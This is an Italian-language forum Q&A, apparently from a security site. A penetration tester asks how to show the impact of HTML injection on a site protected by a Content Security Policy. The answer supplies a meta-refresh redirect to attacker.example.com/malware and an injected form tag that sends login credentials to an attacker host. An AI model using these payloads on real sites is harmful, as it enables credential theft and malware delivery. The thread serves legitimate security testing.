Quali sono alcuni utili tag e payload per l'iniezione HTML su siti protetti da CSP?

3

Sto testando con penna un sito Web che ha risolto gran parte delle sue vulnerabilità XSS semplicemente aggiungendo una politica di sicurezza dei contenuti. Ci sono ancora iniezioni di HTML in diversi punti. Ho cercato di ottenere un file contenente javascript sull'origine tramite una funzione per gli allegati, ma sembra un vicolo cieco.

Poiché non posso eseguire javascript, cosa posso usare come dimostrazione del concetto per mostrare la continua gravità degli attacchi di iniezione HTML nonostante il CSP? Esistono tag HTML che posso ancora utilizzare per compromettere la sicurezza?

Il CSP ha una regola predefinita che consente solo la stessa origine. Tuttavia, ci sono eccezioni per data: in <img> , e la politica consente anche CSS in linea.

    
posta Slix 13.04.2015 - 10:55
fonte

1 risposta

2

Potresti provare a eseguire un reindirizzamento a un altro URL utilizzando i meta-tag:

  <meta http-equiv="refresh" content="1; url=http://attacker.example.com/malware">

E se esiste un modulo di accesso, puoi provare a cambiare la posizione che invia anche aggiungendo un altro elemento form , perché la destinazione per l'invio del modulo non è protetta da CSP.

  <form action=login.php> <!-- original action -->
  <form action=http://attacker.example.com/login.php>  <!-- your injected action -->
  ...<input type=password ....
  </form>

Ovviamente potresti includere qualsiasi tipo di link ad altri siti, perché anche i link non sono interessati da CSP.

    
risposta data 13.04.2015 - 22:47
fonte